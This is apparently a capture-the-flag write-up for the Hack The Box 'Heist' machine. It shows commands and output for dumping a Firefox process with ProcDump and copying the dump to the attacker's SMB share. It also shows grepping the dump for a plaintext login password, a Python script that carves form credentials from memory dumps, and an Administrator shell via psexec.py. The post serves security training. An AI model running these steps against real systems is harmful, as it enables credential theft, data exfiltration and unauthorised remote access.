One way to inspect a process's memory is ProcDump, a Sysinternals tool that writes a full dump (-ma) of a running process for offline analysis. One caveat worth knowing: ProcDump has to open the target with PROCESS_VM_READ, and without SeDebugPrivilege (which Chase does not have) that only works for processes running under your own account. The dump succeeding below therefore tells us this Firefox instance runs as Chase; a process running as Administrator would have failed with access denied.

*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump64.exe -accepteula -ma 6664 firefox.dmp

ProcDump v11.1 - Sysinternals process dump utility
Copyright (C) 2009-2025 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[06:18:52]Dump 1 info: Available space: 3666587648
[06:18:52]Dump 1 initiated: C:\Users\Chase\Desktop\firefox.dmp
[06:18:52]Dump 1 writing: Estimated dump file size is 290 MB.
[06:18:57]Dump 1 complete: 291 MB written in 5.3 seconds
[06:18:58]Dump count reached.

*Evil-WinRM* PS C:\Users\Chase\Desktop> dir

Directory: C:\Users\Chase\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/26/2026 6:18 AM 296976327 firefox.dmp
-a---- 2/26/2026 6:15 AM 0 myeasylog.log
-a---- 2/26/2026 6:14 AM 1339936 procdump.exe
-a---- 2/26/2026 6:18 AM 720968 procdump64.exe
-a---- 4/22/2019 9:08 AM 121 todo.txt
-ar--- 2/25/2026 5:54 AM 34 user.txt
-a---- 2/25/2026 6:30 AM 94310 winPEAS.ps1

*Evil-WinRM* PS C:\Users\Chase\Desktop>

That dump file is going to be large, and analyzing it directly on the target would be messy. It’s much easier to transfer it back to our attacker machine for offline review.

To do that, we can quickly stand up an SMB share locally using Impacket’s smbserver.py.

jbrown@Jabaris-MacBook-Pro examples % smbserver.py -smb2support -username guest -password guest share ~/HTB/heist/        
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies
*Evil-WinRM* PS C:\Users\Chase\Desktop> net use x: \\10.10.14.142\share /user:guest guest
The command completed successfully.

*Evil-WinRM* PS C:\Users\Chase\Desktop> cmd /c "copy firefox.dmp X:\"
1 file(s) copied.
*Evil-WinRM* PS C:\Users\Chase\Desktop>

jbrown@Jabaris-MacBook-Pro heist % ls
firefox.dmp hash.txt passwords.txt sharphound-v2.9.0.zip users

Running strings on the dump is the right first move, but grepping for something generic like "password" returns a massive amount of noise.

Rather than guessing keywords, look at how the frontend actually talks to the backend, which is where Burp Suite comes back into play. Target → Site Map holds the full application structure after interaction, and the login request in it shows:

  • The exact parameter names the form submits (here the password field is login_password, not password)
  • Any hidden fields
  • The endpoint being hit (login.php)

Those exact parameter names are what to search for inside the memory dump, not generic words.

That was the issue: I had been searching for "password" while the real parameter name in the captured request is login_password, and that small difference matters a lot when grepping a 290 MB dump.

So instead of a broad search, I refined it to:

jbrown@Jabaris-MacBook-Pro heist % strings firefox.dmp | grep login_password 
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
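The following Python is an added example (not the author's workflow and not a tool from the write-up) of doing that search without strings and grep: it looks for the exact form parameter name taken from Burp, carves the surrounding query string out of the dump, URL-decodes it with the standard library, and collapses the repeated copies that strings printed three times above. It also searches the UTF-16LE encoding, which strings ignores unless run with -el and which is how much of a Windows process's memory stores text. The dump bytes are constructed for the example: the first string mirrors the crash-reporter variable found above, the field name login_username is an assumption, and the second string is the same form stored as UTF-16.

```python
"""Carve HTTP form credentials out of a process memory dump.

Search for the exact parameter names the web app uses (taken from Burp's
site map), not for the word "password". Windows processes keep many strings
as UTF-16LE, which `strings` misses unless run with -el, so both encodings
are searched.
"""
import re
import sys
from pathlib import Path
from urllib.parse import parse_qs

# Bytes that end a URL/query string in memory (ASCII; widened to UTF-16 below).
_STOP_ASCII = b'\x00 \t\r\n"\'<>?'

# Constructed sample "dump": an ASCII crash-reporter env var in the shape the
# write-up found (field name login_username assumed), a noise entry that a
# generic "password" grep would hit, and a UTF-16LE copy of another login URL.
SAMPLE_DUMP = (
    b"\x00" * 8
    + b"MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php"
    + b"?login_username=admin%40example.local&login_password=4dD!5}x/re8]FBuZ&login=\x00"
    + b"PASSWORD_POLICY=password=complex\x00"
    + (
        "http://localhost/login.php?login_username=chase%40example.local"
        "&login_password=Utf16Only%21&login="
    ).encode("utf-16-le")
    + b"\x00\x00"
)


def _carve(buf: bytes, start: int, end: int, width: int) -> bytes:
    """Expand [start, end) to the surrounding run of non-stop characters,
    stepping one code unit (1 byte for ASCII, 2 for UTF-16LE) at a time."""
    stop = {bytes([c]) + b"\x00" * (width - 1) for c in _STOP_ASCII}
    lo, hi = start, end
    while lo - width >= 0 and buf[lo - width:lo] not in stop:
        lo -= width
    while hi + width <= len(buf) and buf[hi:hi + width] not in stop:
        hi += width
    return buf[lo:hi]


def find_form_credentials(dump: bytes, param: str = "login_password") -> list[dict]:
    """Return every query string containing `param`, URL-decoded, with its offset
    and the encoding it was stored in. Identical strings that sit in several
    places in memory (as in the write-up) are collapsed into one hit."""
    hits, seen = [], set()
    for encoding, width in (("ascii", 1), ("utf-16-le", 2)):
        needle = (param + "=").encode(encoding)
        for m in re.finditer(re.escape(needle), dump):
            chunk = _carve(dump, m.start(), m.end(), width)
            query = chunk.decode(encoding, errors="replace")
            params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
            key = (encoding, query)
            if param in params and key not in seen:
                seen.add(key)
                hits.append({"offset": m.start(), "encoding": encoding, "params": params})
    return hits


if __name__ == "__main__":
    data = Path(sys.argv[1]).read_bytes() if len(sys.argv) > 1 else SAMPLE_DUMP
    name = sys.argv[2] if len(sys.argv) > 2 else "login_password"
    for hit in find_form_credentials(data, name):
        print(hit)
```

Point it at firefox.dmp (and, optionally, a parameter name other than login_password) to get one decoded record per distinct login string rather than three raw lines. The URL-decoding matters in the same way the parameter name does: a password containing %, + or & would come out of strings mangled.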

That URL is the crash reporter's restart argument for the portal login page. The publishing platform's e-mail obfuscation has mangled the username part above to "[email protected]" (it is an e-mail-style address in the dump), but the password is intact, and the psexec.py session below shows it belongs to the Administrator account. With that recovered from memory, we can move toward remote command execution.

Since SMB (port 445) is open, Impacket's psexec.py is one reliable route: it uploads a service binary to a writable admin share (ADMIN$), creates and starts a service that runs it, and talks to it over a named pipe. That requires local administrator rights, so it doubles as confirmation of what the password unlocks, and it takes an NT hash (-hashes) as well as a password for pass-the-hash. Be aware of how loud it is: the random-named .exe in ADMIN$ and the new service (Event ID 7045 in the System log) are exactly what defenders alert on; wmiexec.py or smbexec.py leave a smaller footprint. The user@host argument in the command below was mangled by the same e-mail obfuscation.

jbrown@Jabaris-MacBook-Pro examples % psexec.py '[email protected]'
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Requesting shares on 10.129.5.22.....
[*] Found writable share ADMIN$
[*] Uploading file cSugIBQB.exe
[*] Opening SVCManager on 10.129.5.22.....
[*] Creating service jdLr on 10.129.5.22.....
[*] Starting service jdLr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

C:\Windows\system32> cd ..

C:\Windows> cd ..

C:\> cd users

C:\Users> cd Administrator

C:\Users\Administrator> dir
Volume in drive C has no label.
Volume Serial Number is FA65-CD36

Directory of C:\Users\Administrator

04/22/2019 06:11 PM <DIR> .
04/22/2019 06:11 PM <DIR> ..
04/21/2019 11:08 AM <DIR> 3D Objects
04/21/2019 11:08 AM <DIR> Contacts
02/18/2021 04:00 PM <DIR> Desktop
04/22/2019 08:13 AM <DIR> Documents
04/21/2019 11:08 AM <DIR> Downloads
04/21/2019 11:08 AM <DIR> Favorites
04/21/2019 11:08 AM <DIR> Links
04/21/2019 11:08 AM <DIR> Music
04/21/2019 11:08 AM <DIR> Pictures
04/21/2019 11:08 AM <DIR> Saved Games
04/21/2019 11:08 AM <DIR> Searches
04/21/2019 11:08 AM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 3,367,124,992 bytes free

C:\Users\Administrator> cd Desktop

C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is FA65-CD36

Directory of C:\Users\Administrator\Desktop

02/18/2021 04:00 PM <DIR> .
02/18/2021 04:00 PM <DIR> ..
02/25/2026 05:54 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,367,124,992 bytes free

C:\Users\Administrator\Desktop> type root.txt
****ROOTFLAGFOUNDHERE*****

C:\Users\Administrator\Desktop>

And just like that — we’ve completed the heist. 🎯

What started as simple web enumeration turned into credential harvesting, lateral movement, memory analysis, and finally remote command execution.

Quick recap of the chain:

  • Enumerated the web portal and discovered internal conversation + router config
  • Cracked the Cisco Type 5 hash → recovered stealth1agent
  • Used NetExec to validate credential reuse over SMB
  • Enumerated users via RID brute forcing
  • Password sprayed and gained stronger access
  • Leveraged WinRM foothold for internal enumeration
  • Identified Administrator session activity
  • Dumped Firefox memory with ProcDump
  • Used targeted string searching (login_password) to extract credentials
  • Executed remote commands via psexec.py over SMB
  • Retrieved the admin flag

Another one down. On to the next.


Source: https://infosecwriteups.com/%EF%B8%8F-pulling-off-the-heist-a-methodical-htb-takedown-c4829c144bb2?source=rss----7b722bfd1b8d--bug_bounty